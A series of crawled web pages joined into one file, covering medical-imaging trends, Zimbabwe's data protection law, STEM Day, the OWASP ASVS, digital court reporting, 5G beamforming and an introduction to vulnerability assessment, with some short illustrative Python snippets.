Alzheimer’s disease (AD) is a progressive and irreversible neurodegenerative disease which eventually results in cognitive dysfunction and impairs the individual from performing basic routine tasks. Currently, no diagnostic modality assures 100% sensitivity in AD, and the diagnosis is confirmed only on brain autopsy after the individual’s death. At present, brain imaging studies (CT, MRI and PET) and cerebrospinal fluid (CSF) protein studies are at the forefront of biomarker research. However, these diagnostics are expensive, require elaborate infrastructure, and hinder the screening of large populations of the order of millions. Interestingly, in the recent past, several studies have looked at the retina as a possible diagnostic biomarker for AD. Since the eye is a natural extension of the brain, studies have explored and convincingly shown that Aβ plaques and neurofibrillary tangles, the classical AD pathology seen in brain tissue, are also seen in retinal tissue either at the same time as, or earlier than, in the brain. This finding has excited the scientific and medical community globally, as changes in eye pathology can be monitored non-invasively and in a low-resource setting without incurring high capital expenditure.
Electroretinogram (ERG) and Visual Evoked Potentials (VEP) in AD retina shows changes such as Slower N35, P50 implicit time, reduced P50, N95 amplitudes, reduced P1 amplitudes, Slower P100 implicit time, etc. Advantages of retinal biomarkers are that they are non-invasive, affordable and can be used for mass screening.
PET Imaging for the diagnosis of AD uses radiotracers with affinity for Aβ plaques and tau proteins. But the disadvantage of PET is that it cannot be used for population screening as it is a costly test, involves irradiation of the subject and a lower spatial resolution. CSF protein studies involve drawing samples through lumbar puncture procedure which makes it an unsuitable candidate for mass screening.
Key challenges of ERG or VEG techniques is that it is of low specificity as other illnesses such as glaucoma and aging also display similar findings. Other tests to rule out age related changes and other systemic diseases can increase the specificity of these tests.
4. Optical Technologies
4.1. Optical coherence tomography (OCT)
OCT exploits the properties of near-infrared light to generate cross-sectional images of the anatomy being studied. The resolution of OCT images ranges from 10 µm to 15 µm and is limited by the diffraction of light. OCT can also generate 3D volumetric images, which can be a valuable tool in cancer assessment. The technology does not involve large capital costs to acquire or operate, but its biggest disadvantage is its shallow depth of penetration (maximum 1 mm).
OCT is a commercialised technology and is already the standard of care in ophthalmology imaging. The technology is also being investigated in the following therapy areas for screening, diagnosis and monitoring.
- Cardiovascular: OCT can be utilized for detailed 3D imaging of the microstructure of coronary walls for the diagnosis of coronary lesions and for guiding interventional procedures.
- Gastrointestinal: OCT will be handy diagnostic tool for a large number of GI diseases and disorders such as Barrett’s Oesophagus, colon polyps, metastatic cancer, and so on
- Respiratory: Lung cancer diagnosis, biopsy, airway remodelling in COPD
- Urinary tract: Transition cell carcinoma, urethral tumors and nerve sparing surgery in prostate cancer
- Gynecology: cervical cancer, ovarian cancer, studying the fallopian tube patency for infertility
- Neuro Imaging: Retinal Nerve Fibre Layer thickness, which is a biomarker for Alzheimer's Disease
As OCT application development matures, it is expected to emerge as an alternative technology to intravascular ultrasound (IVUS) in cardiac applications, to CT and MRI in several cancer screening and diagnostic settings, to fluoroscopy in hysterosalpingography for fallopian tube patency exploration, and to PET imaging in Alzheimer’s disease.
4.2. Capsule endoscopy/ Camera pills
Capsule endoscopy is a commercially available technology which uses a small, wireless camera built into a disposable capsule that can be swallowed and excreted normally. The capsule travels the entire length of the digestive tract, capturing thousands of pictures for as long as the batteries last, aided by a light source in the capsule. The captured images are transmitted to a paired storage device worn on the body. When widely adopted, capsule endoscopy will compete with colonoscopy and CT colonography. Adding magnetic control to direct the movement of the capsule within the GI tract would increase the adoption of this technology among surgeons. Current capsule endoscopy systems compress the captured images, so image quality is not satisfactory compared with conventional endoscopy systems. Battery life has also been a major concern, as a short battery life could mean that not all images in the region of interest are captured. When these technology issues are ironed out, capsule endoscopy will emerge as a significant screening and diagnostic tool for GI surgeons.
5. Radiowave Imaging
5.1. Microwave Imaging
Microwave Imaging (MI) for breast cancer detection exploits the dielectric contrast between malignant and healthy tissues. Microwave imaging can emerge as an alternative technology to mammography, avoiding painful breast compression and exposure to harmful radiation. Microwave technology is also a low-cost alternative to pricier modalities such as MRI in breast imaging. Ultra-wide-band (UWB) radar and tomography are the two approaches being investigated for MI. The UWB approach is largely dependent on the sensors and the bandwidth of the signal. Clinical trials have demonstrated that it is possible to detect tumors as small as 1 cm with the tomography technique. The drawback of this technology is the heavy computational requirement, which leads to a long output time. Studies have employed magnetic nanoparticles as a contrast agent to improve the accuracy of breast cancer detection.
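As a toy numerical illustration of that dielectric-contrast principle, the sketch below computes the normal-incidence reflection coefficient between two tissues: the larger the permittivity contrast, the stronger the reflection a radar-style system can detect. The permittivity values are rough assumptions for illustration, not clinical data.

```python
# Toy illustration of the dielectric-contrast principle behind microwave
# breast imaging: a larger permittivity contrast between tissues yields a
# stronger reflection at their boundary. Values are illustrative only.

def reflection_coefficient(eps_a: float, eps_b: float) -> float:
    """Normal-incidence reflection coefficient between two lossless media."""
    na, nb = eps_a ** 0.5, eps_b ** 0.5  # refractive indices
    return abs((na - nb) / (na + nb))

healthy = 10.0    # assumed relative permittivity of healthy tissue
malignant = 50.0  # assumed relative permittivity of malignant tissue

print(f"healthy/malignant contrast: {reflection_coefficient(healthy, malignant):.2f}")
print(f"healthy/healthy contrast:   {reflection_coefficient(healthy, 12.0):.2f}")
```

The malignant boundary reflects roughly an order of magnitude more strongly than the healthy-to-healthy one, which is what makes detection feasible in principle.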
Various technologies across different platforms are in different stages of development to realize non-invasive, easy-to-use and low-cost devices suitable for screening, diagnosis and treatment monitoring. Innovation in the existing imaging modalities, liquid biopsy and bioelectric signals looks promising and closer to market. These technologies have to be closely tracked to understand whether they will diminish the significance of the current standard imaging technologies or form excellent complementary tools to them.
If you would like more insights on Disruption in Medical Imaging, please connect with us! Email firstname.lastname@example.org and speak to a thought leader in this field.
This article was written with contributions from Dr. Suresh Kuppuswamy, Medical Imaging-Principal Analyst from the Frost & Sullivan’s Transformation Health Practice. | <urn:uuid:e12611bf-5401-48a3-8310-67cea073ecc4> | CC-MAIN-2024-38 | https://www.frost.com/growth-opportunity-news/conventional-medical-imaging-modalities-facing-disruption/ | 2024-09-20T04:27:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652130.6/warc/CC-MAIN-20240920022257-20240920052257-00292.warc.gz | en | 0.924383 | 3,348 | 2.90625 | 3 |
Access to Information and Protection of Privacy Act (Chapter 10:27);
Banking Act (Chapter 24:20);
Courts and Adjudicating Authorities (Publicity Restrictions) Act (Chapter 07:04);
Consumer Protection Act (Chapter 14:44);
Census and Statistics Act (Chapter 10:29);
Cyber and Data Protection Act (Chapter 12:07);
Interception of Communications Act (Chapter 11:20); and,
National Registration Act (Chapter 10:17);
Communication Technology (“ICT Policy”).
Definition of personal data
The Access to Information and Protection of Privacy Act defines personal information as recorded information about an identifiable person which includes:
- The person's name, address, or telephone number;
- The person's race, national or ethnic origin, religious or political beliefs or associations;
- The person's age, sex, sexual orientation, marital status, or family status;
- An identifying number, symbol or other particulars assigned to that person;
- Fingerprints, blood type or inheritable characteristics;
- Information about a person's healthcare history, including a physical or mental disability;
- Information about educational, financial, criminal or employment history;
- A third party's opinions about the individual;
- The individual's personal views or opinions (except if they are about someone else); and,
- Personal correspondence with home or family.
Definition of sensitive personal data
There is no law that defines sensitive personal data. However, in terms of the Data Protection Act, sensitive data refers to:
- information or any opinion about an individual which reveals or contains the following:
- racial or ethnic origin;
- political opinions;
- membership of a political association;
- religious beliefs or affiliations;
- philosophical beliefs;
- membership of a professional or trade association;
- membership of a trade union;
- sex life;
- criminal, educational, financial or employment history;
- gender, age, marital status, or family status;
- health information about an individual;
- genetic information about an individual; or
- any information which may be considered as presenting a major risk to the rights of the data subject;
In terms of the Data Protection Act, the Postal and Telecommunication Regulatory Authority, established in terms of section 5 of the Postal and Telecommunications Act [Chapter 12:05], is the recognised National Data Protection Authority. The Authority has the responsibility to promote and enforce the fair processing of personal data and advise the Minister of Information Communication Technology on matters relating to privacy rights. The Authority is mandated to conduct inquiries and investigations, either of its own accord or on the request of any interested person, in relation to data protection rights.
Under the recently enacted Data Protection Act, a data protection officer must be appointed to ensure compliance with all obligations provided for in the Act.
The Zimbabwe Media Commission's mandate includes the following:
- Ensures that the people of Zimbabwe have equitable and wide access to information;
- Comments on the implications of proposed legislation or programs of public bodies on access to information and protection of privacy; and,
- Comments on the implications of automated systems for collection, storage, analysis, or transfer of information or for the access to information or protection of privacy.
The Revised ICT Policy proposes the establishment of a quasi-government entity to monitor Internet traffic. It states that all Internet gateways and infrastructure will be controlled by a single company, while a National Data Centre to support both public and high security services and information will be established.
There is no law that requires the registration of databases.
In terms of the Data Protection Act, a Data Protection Officer refers to any individual appointed by the data controller and is charged with ensuring, in an independent manner, compliance with the obligations provided for in this Act.
There are no specific provisions for the collectors of personal data to obtain the prior approval of data subjects for the processing of their personal data. However, when collecting data the controller or the controller’s representative shall provide the data subject with at least the following information:
- the name and address of the controller and of his or her representative, if any;
- the purposes of the processing;
- the existence of the right to object, by request and free of charge, to the intended processing of data relating to him or her, if it is obtained for the purposes of direct marketing;
- whether compliance with the request for information is compulsory or not, as well as what the consequences of the failure to comply are;
- taking into account the specific circumstances in which the data is collected, any supporting information, as necessary to ensure fair processing for the data subject, such as:
- the recipients or categories of recipients of the data;
- whether it is compulsory to reply, and what the possible consequences of the failure to reply are;
- the existence of the right to access and rectify the data relating to him or her except where such additional information, taking into account the specific circumstances in which the data is collected is not necessary to guarantee accurate processing.
- other information dependent on the specific nature of the processing, as specified by the Authority.
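The disclosure requirements above amount to a checklist a controller must satisfy at collection time. A minimal, hypothetical sketch of such a check follows; the field names are my own shorthand, not statutory terms.

```python
# Sketch of a compliance checklist for the collection-notice requirements
# listed above. Field names are illustrative shorthand, not statutory text.

REQUIRED_NOTICE_FIELDS = {
    "controller_name_and_address",
    "processing_purposes",
    "right_to_object_to_direct_marketing",
    "whether_compliance_is_compulsory",
    "consequences_of_failure_to_comply",
}

def missing_notice_fields(notice: dict) -> set:
    """Return the required fields that are absent or empty in a notice."""
    return {f for f in REQUIRED_NOTICE_FIELDS if not notice.get(f)}

notice = {
    "controller_name_and_address": "Example Ltd, 1 Main St, Harare",
    "processing_purposes": "customer account administration",
}
print(sorted(missing_notice_fields(notice)))
```

A real implementation would also cover the context-dependent supporting information (recipients, access and rectification rights) that the Act requires where applicable.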
For the purposes of processing information, Section 13 of the Data Protection Act is quite instructive. In terms of that Section, every data controller or data processor shall ensure that personal information is:
- processed in accordance with the right to privacy of the data subject;
- processed lawfully, fairly and in a transparent manner in relation to any data subject;
- collected for explicit, specified and legitimate purposes and not further processed in a manner incompatible with those purposes;
- adequate, relevant, limited to what is necessary in relation to the purposes for which it is processed;
The Census and Statistics Act contains provisions which restrict the use and disclosure of information obtained during the conducting of a census exercise. Under this Act, authorities are able to collect, compile, analyse, and abstract statistical information relating to any of the following:
- General activities and conditions of the inhabitants of Zimbabwe and to publish such statistical information
The transfer of data to any other jurisdiction is governed in terms of Part VII of the Data Protection Act, under sections 28 and 29.
In terms of Section 28 of the Data Protection Act:
- a data controller may not transfer personal information about a data subject to a third party who is in a foreign country unless an adequate level of protection is ensured in the country of the recipient or within the recipient international organisation and the data is transferred solely to allow tasks covered by the competence of the controller to be carried out.
- The adequacy of the level of protection afforded by the third country or international organisation in question shall be assessed in the light of all the circumstances surrounding a data transfer operation or set of data transfer operations; with particular consideration being given to the nature of the data, the purpose and duration of the proposed processing operation or operations, the recipient third country or recipient international organisation, the laws relating to data protection in force in the third country or international organisation in question and the professional rules and security measures which are complied with in that third country or international organisation.
- The Authority shall lay down the categories of processing operations for which and the circumstances in which the transfer of data to countries outside the Republic of Zimbabwe is not authorised.
- The Minister responsible for the Cyber security and Monitoring Centre in consultation with the Minister, may give directions on how to implement this section with respect to transfer of personal information outside of Zimbabwe.
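The gating logic of section 28 can be sketched as a simple policy check: a transfer is only permitted when the destination offers an adequate level of protection and the transfer is solely for tasks within the controller's competence. The adequacy list below is a placeholder assumption, since adequacy determinations are made by the Authority, not hard-coded.

```python
# Sketch of the section-28 transfer gate. The adequacy list is a
# hypothetical placeholder; in practice it would come from the Authority.

ADEQUATE_DESTINATIONS = {"CountryA", "CountryB"}  # hypothetical findings

def may_transfer(destination: str, within_controller_competence: bool) -> bool:
    """Both conditions of section 28 must hold for the transfer to proceed."""
    return destination in ADEQUATE_DESTINATIONS and within_controller_competence

print(may_transfer("CountryA", True))   # adequate destination, proper purpose
print(may_transfer("CountryC", True))   # no adequacy finding: blocked
```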
Section 18 of the Data Protection Act provides guidelines for the protection of data. It states that to safeguard the security, integrity and confidentiality of the data, the controller or his or her representative, if any, or the processor, shall take the appropriate technical and organisational measures that are necessary to protect data from negligent or unauthorised destruction, negligent loss, unauthorised alteration, or access and any other unauthorised processing of the data.
Further the Section also provides that the Data Protection Authority may issue appropriate standards relating to information security for all or certain categories of processing. Since the enactment of this Act the Data Protection Authority is still to issue any appropriate standards.
The Revised ICT Policy states that there will be development, implementation and promotion of appropriate security and legal systems for e-commerce, including issues related to cybersecurity, data protection and e-transactions. The Policy states that the following laws will be enacted to cater for intellectual property rights, data protection and security, freedom of access to information, computer related and cybercrime laws:
- data protection and privacy;
- intellectual property protection and copyright;
- consumer protection; and
- child online protection.
Section 19 of the Data Protection Act places a duty on the data controller to notify the Authority “within twenty-four (24) hours of any security breach affecting data he or she processes”.
Mandatory breach notification
Section 19 of the Data Protection Act uses the word “shall” which makes it mandatory to notify the Authority within twenty-four (24) hours.
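As a small illustration of that twenty-four-hour rule, the sketch below computes a notification deadline from a breach-detection timestamp and flags late notifications. The timestamps are invented for the example.

```python
# Sketch of the section-19 deadline: the Authority must be notified within
# twenty-four hours of a security breach. Timestamps are illustrative.
from datetime import datetime, timedelta

NOTIFICATION_WINDOW = timedelta(hours=24)

def notification_deadline(breach_detected_at: datetime) -> datetime:
    return breach_detected_at + NOTIFICATION_WINDOW

def is_notification_late(breach_detected_at: datetime,
                         notified_at: datetime) -> bool:
    return notified_at > notification_deadline(breach_detected_at)

detected = datetime(2024, 1, 10, 9, 0)
print(is_notification_late(detected, datetime(2024, 1, 10, 20, 0)))  # False
print(is_notification_late(detected, datetime(2024, 1, 11, 10, 0)))  # True
```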
The Constitution mandates the Human Rights Commission (HRC) to enforce a citizen's human rights where they have been violated. The right to privacy, including the right not to have the privacy of one's communication infringed, is a basic human right and, thus, falls within the purview of the HRC. However, the Cyber Security and Monitoring of Interceptions of Communications Centre (CSMICC), established by the Interception of Communications Act, is mandated to, among other things, monitor communications made over telecommunications, radio communications and postal systems and to give technical advice to service providers. The mandate of the CSMICC does not preclude it from monitoring computer-based data for the purposes of enforcing an individual's right to privacy where it is found that such right has been infringed.
Further, the CSMICC also has the duty to oversee the enforcement of the Act to ensure that it is enforced reasonably and with due regard to fundamental human rights and freedoms.
Zimbabwe recently enacted the Consumer Protection Act (Chapter 14:44) which has introduced several measures aimed at protecting consumers from unfair trade practices.
The Consumer Protection Act does not make specific reference to electronic marketing; however, it provides certain guidelines around electronic transactions, the information to be provided by the service provider, a cooling-off period in electronic transactions, and unsolicited goods, services or communications.
There is currently no specific online privacy legislation. | <urn:uuid:a12519d3-4136-47ef-96ef-d5b82f8ecaa2> | CC-MAIN-2024-38 | https://www.dlapiperdataprotection.com/index.html?t=contacts-section&c=ZW | 2024-09-12T23:43:01Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651498.46/warc/CC-MAIN-20240912210501-20240913000501-00092.warc.gz | en | 0.914948 | 2,127 | 3.109375 | 3 |
#STEM Day is designed to ignite young minds with the magic of science, technology, engineering, art, and mathematics, shaping the innovators of tomorrow’s world. With reports of more STEM-based jobs being created on a daily basis, but fewer young people choosing education pathways in this area, it’s essential to encourage young people to learn more about and pursue the amazing career opportunities there are within this field, including the digital infrastructure industry!
Here’s five suggestions for ways to celebrate National #STEMDay:
1. Ask the next young person you meet if they know what a data center is and share your knowledge about how important they are for our modern connected world
2. Listen to Inside Data Centres podcast special episode – UTC Special: Educating the Future Data Center Engineers and be inspired
3. Show your children the Kao Academy to find a ‘build your own data center’ print out activity, crossword puzzle, games and more!
4. Become a STEM ambassador and inspire the next generation to consider a career in this exciting sector
5. Think about what your organization can do to help young people learn about careers in this industry. Could you invite a local school for a tour of your facility or attend a careers fair? Make it your mission to do something to raise awareness! | <urn:uuid:24439205-d5f3-4da4-90c6-857af86551b1> | CC-MAIN-2024-38 | https://www.cnet-training.com/us/news/celebrate-stem-day-with-cnet/ | 2024-09-14T01:34:52Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.77/warc/CC-MAIN-20240913233654-20240914023654-00892.warc.gz | en | 0.92813 | 268 | 3.078125 | 3 |
While we’ve discussed OWASP (the Open Web Application Security Project), its importance to the security of applications and development, and the standards it sets, there are other aspects that deserve our attention. One of the primary elements of OWASP that demands such attention is the Application Security Verification Standard (ASVS).
If you use, have worked with or have done any research on OWASP, then you have inevitably run into the Application Security Verification Standard. So what exactly is the ASVS? What is it used for and why does it matter? These are questions that you should ask, or have probably already asked – and this is why you should know…
The ASVS was created by OWASP, often referred to as “the free and open software security community.” In that spirit, and at its core, the ASVS was created by developers for developers. In order to understand the ASVS, it is best explained by answering what it does and how it is used.
What it does is provide an established framework for security measures. How that is applied consists of varying levels of verification. Here is an overview of these two considerations that will help you to better understand the ASVS and its purpose.
OWASP provides measures, information and creates a common language and platform for developers, engineers and others in efforts to establish safe working environments for web applications. While OWASP has excelled in doing just that, verifying and confirming that those safety protocols are being met is the role of the ASVS.
What security measures are applied to what applications and what level of security does any particular application demand? These are the types of clarity that the ASVS provides, with the latter leading into how the ASVS is used and applied.
The OWASP.org site states that “The OWASP ASVS defines verification and documentation requirements… .” By defining and establishing these verification and documentation standards, applications can be measured against them and rated by security levels.
The OWASP ASVS uses a range of “levels” to classify and determine the web application security verification level. This allows developers to more easily determine and see real-world application security needs. A level 1 application, for instance, might suffice for a web application that doesn’t require any other level of verification. This hierarchical system of levels makes the determination of required application security simple and prevents less secure applications from getting through.
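As an illustration of how such a level hierarchy might drive a review target, here is a simplified sketch. The level descriptions are paraphrased, not the official ASVS requirement text, and the two risk questions are my own simplification of a much richer decision.

```python
# Simplified sketch of ASVS-style assurance levels driving a review target.
# Descriptions are paraphrased for illustration, not official ASVS wording.

ASVS_LEVELS = {
    1: "baseline: minimum assurance for low-risk applications",
    2: "standard: recommended for applications handling sensitive data",
    3: "advanced: high-value applications (e.g. financial, medical, critical)",
}

def target_level(handles_sensitive_data: bool, high_value: bool) -> int:
    """Pick a review level from two coarse risk questions (illustrative)."""
    if high_value:
        return 3
    return 2 if handles_sensitive_data else 1

level = target_level(handles_sensitive_data=True, high_value=False)
print(f"Review against Level {level}: {ASVS_LEVELS[level]}")
```

In a real engagement, the verifier would select the target level from the organisation's risk profile and then check the application against every requirement at that level.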
Although this sounds rather simple, the work, years, time and effort invested into building the libraries, the OWASP community, and even the ASVS verification process are anything but simple. The ASVS uses an individual or team as part of its verification protocol. This person or these people are called a “verifier” and, according to the OWASP site, “It is a verifier’s responsibility to determine if an application meets all of the requirements at the level targeted by a review.”
The technical language, the developer and programmer jargon and other web application security discussions can make all of this seem overwhelming. What many organizations want to know is why it matters to them…
On the whole, most business owners, company presidents, and CEOs aren’t web application security experts. That is why they hire security teams and invest heavily in security measures. This isn’t a hypothetical situation either, this is real web warfare.
One article discussing web application security began this way:
“Qatar National Bank, a recent victim of a data breach exposing over 1.4GB of customers’ data, including full personal data and credit card information, suspects it was compromised…”
That story went on to say…
“Later, the same hacking team compromised six more financial institutions, using vulnerabilities in their websites and web applications.”
There are countless other stories involving companies dealing with web application breaches, failures, and other serious occurrences. Why is web application security important for companies? There are plenty of businesses that could report millions of dollars worth of reasons and millions of customers too.
Any business that is succeeding and leading the way today, is connected. That means using web applications across a myriad of platforms and employing an array of different technologies. In order to succeed in the business market now, it requires a complete commitment to these technologies. To reach customers, develop new applications and interact on the business stage, security isn’t optional it is required.
This is where the advantage of using a system like the ASVS is completely realized. The first advantage offered through the ASVS is that it is an extension of the proven, supported and trusted OWASP principles and methodologies.
From this foundation, the level of application security is measured, documented and then rated and assigned a level as was previously discussed. This not only gives businesses peace of mind, it, more importantly, also offers a system that tests and proves applications and their level of security.
The companies that recognize the importance and practical reasons behind using the OWASP ASVS are already one step ahead. In addition to the security measures afforded through the ASVS, businesses can also promote the safety of their applications and interfaces.
Customer and clients today are educated and smart, that means they understand the importance of protecting their most private information. Perhaps, more than any other reason, it is the trust that a company can instill to their patrons because of measures like the ASVS.
We can do business safely, we can share data and information through web apps without great fear if we make security a top priority. Customers will see this as a safe environment. Our business partners will appreciate the efforts made to ensure safe business transactions, while our business will benefit because of these and many other reasons.
From the programmer, developer and architect side of the fence, this system offers metrics to gauge security levels and it provides clarity into live application scenarios. From the business side, it is how companies protect themselves and those they do business with – that is smart business and that is why companies need to know about the ASVS. | <urn:uuid:21615150-1a30-45df-ac7d-872d88fb3bc5> | CC-MAIN-2024-38 | https://www.kiuwan.com/blog/why-companies-need-to-know-about-the-owasp-application-security-verification-standard-asvs/ | 2024-09-15T06:20:12Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651616.56/warc/CC-MAIN-20240915052902-20240915082902-00792.warc.gz | en | 0.955754 | 1,238 | 2.78125 | 3 |
Artificial Intelligence is helping reshape the nature of work across a wide range of industries and positions; digital court reporting is no exception.
Crisis and surrounding environment
In May 2016, 17,700 Americans held jobs as court reporters, according to the Bureau of Labor Statistics (BLS). By May 2019 – the most recent date for which figures are available – that number had dropped to 14,530 – a decrease of almost 20%.
Long before the COVID-19 pandemic, the supply of court reporters was falling well short of the legal system’s demand, prompting many courts to integrate digital technology and automated transcription services to generate faster transcripts in order to meet increasing needs. Now, faced with a growing backlog of cases after one year of COVID-19, the courts need technology-enhanced court reporting more than ever.
Here are four things to know about the rise of digital court reporting and its impact.
1. It’s not replacing court reporters.
Even as more court systems adopt digital transcription technology, the job outlook for court reporters is still positive. According to BLS data, the number of court reporters is projected to increase 9% from 2019 to 2029.
As with many other jobs being augmented by AI, court reporters will work alongside automated technology, rather than be displaced by it. As automated services transcribe proceedings in real time, court reporters will take on key roles such as taking detailed notes and clarifying key elements, including illegible sounds, names and phrases that are difficult to spell or pronounce.
2. It’s hardly new.
While digital court technology has been receiving more attention amid reporter shortages and growing adoption in recent years, its arrival on the scene dates back more than a quarter century.
Thanks to communication access real time translation (CART) technology, Camille Jones was the first person with hearing loss to sit on a jury in a Los Angeles County Superior Court in 1995. The application of CART was still new at the time, and the equipment was a bit heavy to lug around, but it nevertheless revolutionized the courtroom experience for Camille and others with hearing impairments.
In 1996, Government Technology reported on how audio and video recordings, along with computer-assisted transcription, were “changing the job of court reporters” in court systems burdened by high caseloads and tight budgets.
Today, while these technologies still exist, they have evolved tremendously to offer seamless courtroom integration, as well as significantly greater accuracy and speed.
3. Speed is the name of the game.
Court reporters are renowned for their incredibly fast typing skills. With AI at their side, transcription can be even faster – up to 30% faster. Given the formidable bottlenecks courts are currently facing, that’s a considerable improvement.
4. More states are getting on board.
When the state of South Carolina was facing a severe shortage of court reporters two years ago, the state not only stepped up hiring and training, but partnered with a state community college to train people to work alongside digital court reporting services.
“Today, with a significant number of our court reporters being able to capture the record using more than one method, we are able to ensure that all scheduled terms of court may proceed and that the record of those proceedings is captured,” Ginny Jones of the South Carolina Court Administration told the Greenville News.
New York has similarly committed to training its court reporters to work alongside digital reporting technology, paving the way toward a more efficient future which combines Artificial Intelligence with irreplaceable human skills.
Digital court reporting
What was true when the first stenographers began their work holds true today: Court reporters fill vital functions in the legal system, and they’ll continue to do so. By enhancing their work with the latest technology – as is happening in countless other fields – court reporters will have the tools and resources that they need to do their jobs with even greater accuracy, efficiency, and bandwidth. | <urn:uuid:feefdc43-1848-4f78-b97e-290a43c8edf9> | CC-MAIN-2024-38 | https://coruzant.com/digital-strategy/4-things-to-know-about-the-future-of-digital-court-reporting/ | 2024-09-17T18:20:48Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651829.57/warc/CC-MAIN-20240917172631-20240917202631-00592.warc.gz | en | 0.960836 | 813 | 2.6875 | 3 |
This blog post is part of a series called “CommScope Definitions” in which we will explain common terms in communications network infrastructure.
For next-generation wireless networks such as 5G, beamforming is an important feature of base station antennas. Beamforming has been used for decades, predominantly in military radar, jammer and satellite applications to achieve a highly directive antenna beam that is electrically steerable. A steered beam was often achieved using a rotatable reflector antenna as is commonly seen in airport and marine radars or radio astronomy antennas. Yet, mechanically steered antennas have several disadvantages, such as mechanical joints that have limited life due to wear, fragile rotating RF joints to guide the transmitted/received energy to the radio, relatively slow re-steering times, and non-random access to specific pointing angles.
Electronic scanning arrays circumvent these limitations by providing an antenna array that is fixed in its position with no moving parts. Its antenna pattern is steered electrically rather than mechanically. In previous mobile wireless generations, mechanically steered arrays were not viable due to the limitations mentioned, and electrically steered arrays were considered impractical due to the intense signal processing capability required.
As silicon densities and speeds have increased at an exponential rate over the past decades, it is now feasible to implement electrically steered beamforming in mobile networks—and even user equipment— at a viable price point. For next-generation mobile communication networks, electrical beamforming is now considered a vital feature in order to meet the required data rates and network capacity, to achieve sufficient coverage using higher frequency band with higher path losses, and to better manage interference.
Use of beamforming in mobile networks offers several advantages over the sectorized antenna patterns used in previous and current mobile wireless generations. In these networks, base stations broadcast the channel resources designated for a specific user over the full sector, so only a very small percentage of the power is radiated in the direction of the intended user. With beamforming, the use of a directive beam focuses the transmitted signal strength and receiver sensitivity in the direction of the intended wireless link, increasing the range of the link and the available throughput to a given mobile user.
The other significant benefit is that use of a directive antenna beam reduces interference to other mobile users by minimizing radiation in directions other than the intended mobile user. This allows the same wireless spectral resources to be used for multiple, simultaneous links within a sector with manageable interference levels.
A beamforming antenna array is generally comprised of many individual antenna elements or sub-arrays. Each element or sub-array of elements is connected to an individual transmitter/receiver channel. The more elements that are arrayed generally results in a narrower beam and higher gain at the peak of the beam. Since each antenna element is transmitting or receiving the signal, the signal transmitted or received from some angles will add in-phase as the channels are combined, whereas signals from other angles will subtract and thereby cancel each other.
The carrier frequency radiated by each element of the array combines either constructively or destructively across various angles to form peaks and nulls in the antenna beam. If the delay through each channel is equal, then the peak of the antenna beam will point directly perpendicular to the array, otherwise known as the boresight angle. By progressively increasing the electrical delay across the elements of the array, the peak of the antenna beam is positioned at an angle that is offset from boresight. Therefore, by carefully controlling the relative electrical delay through each transmitter/receiver path to each of the antenna elements, the antenna beam can effectively be electrically steered across a wide angular range. Using advanced acquisition and tracking algorithms, the angle for each mobile user is determined and tracked to ensure the user receives the strongest signal with minimum interference.
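The progressive-delay steering described above can be demonstrated numerically. The sketch below evaluates the normalized array factor of a uniform linear array: when the progressive phase matches the arrival angle, the element contributions add in phase and the power peaks; away from that angle they partially or fully cancel. The element count and half-wavelength spacing are illustrative choices.

```python
# Sketch of uniform linear array beam steering: a progressive phase shift
# across the elements moves the array-factor peak away from boresight.
# Eight elements at half-wavelength spacing are illustrative values.
import math

def array_factor_power(theta_deg: float, steer_deg: float,
                       n_elements: int = 8,
                       spacing_wavelengths: float = 0.5) -> float:
    """Normalized radiated power of a uniform linear array at angle theta
    when the beam is electrically steered to steer_deg."""
    k_d = 2 * math.pi * spacing_wavelengths
    # Residual per-element phase between arrival angle and steering angle
    psi = k_d * (math.sin(math.radians(theta_deg))
                 - math.sin(math.radians(steer_deg)))
    re = sum(math.cos(n * psi) for n in range(n_elements))
    im = sum(math.sin(n * psi) for n in range(n_elements))
    return (re * re + im * im) / n_elements ** 2

# Unity at the steered direction, a null at boresight for this geometry --
# the off-peak suppression is what limits interference to other users.
print(round(array_factor_power(30.0, steer_deg=30.0), 3))  # 1.0
print(round(array_factor_power(0.0, steer_deg=30.0), 3))   # 0.0
```

Increasing `n_elements` narrows the main beam and raises its gain, matching the relationship described in the text.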
Advances in semiconductor process technology have enabled the implementation of dozens of transmitter/receiver channels and many megaflops of processing capability within relatively small and low power electrical components. This has in turn brought the use of advantageous techniques such as beamforming within reach of mobile wireless networks and low-cost mobile devices to greatly enhance the mobile experience of future network users and address the ever-increasing demands for wireless throughput and capacity. | <urn:uuid:70e7898d-2eda-4b49-9d67-6290abf93ed0> | CC-MAIN-2024-38 | https://www.commscope.com/Blog/CommScope-Definitions--What-is-5G-beamforming/ | 2024-09-17T19:11:22Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651829.57/warc/CC-MAIN-20240917172631-20240917202631-00592.warc.gz | en | 0.931 | 868 | 3.8125 | 4 |
Identifying & mitigating vulnerabilities in systems & applications is crucial for ensuring their security & minimising the risk of cyber attacks. Vulnerabilities refer to weaknesses or flaws in software or hardware that can be exploited by attackers to gain unauthorised access, steal data or cause damage to the system.
Failing to identify & mitigate vulnerabilities can lead to serious consequences, including financial losses, reputation damage & legal liability. Furthermore, as technology advances & cyber threats become more sophisticated, the number & severity of vulnerabilities continue to increase, making it more important than ever to address them proactively.
By identifying & mitigating vulnerabilities, organisations can reduce their risk of security breaches, protect their sensitive data & safeguard their systems & applications against various threats. There are two types of testing commonly used in the field of Cyber Security to identify such potential security weaknesses: Vulnerability Assessment & Penetration Testing.
What is Vulnerability Assessment?
Vulnerability Assessment is the process of identifying, quantifying & prioritising vulnerabilities in a system, network or application. The goal of a Vulnerability Assessment is to identify weaknesses that could be exploited by attackers & to provide recommendations for addressing them before they can be exploited.
Vulnerability Assessments typically involve using automated tools to scan systems & applications for known vulnerabilities & analysing the results to determine the severity of each vulnerability. The output of a Vulnerability Assessment [VA] is typically a Report that outlines the vulnerabilities identified, their severity ratings & recommended remediation steps. This information can be used by organisations to improve their security posture by addressing vulnerabilities before they can be exploited by attackers.
Vulnerability Assessments can identify various types of vulnerabilities. Some common types of vulnerabilities that can be identified through Vulnerability Assessments include:
- Software vulnerabilities: These are flaws or weaknesses in software applications, operating systems or libraries that can be exploited by attackers. Examples include Buffer Overflow vulnerabilities, SQL Injection vulnerabilities & Cross-Site Scripting [XSS] vulnerabilities.
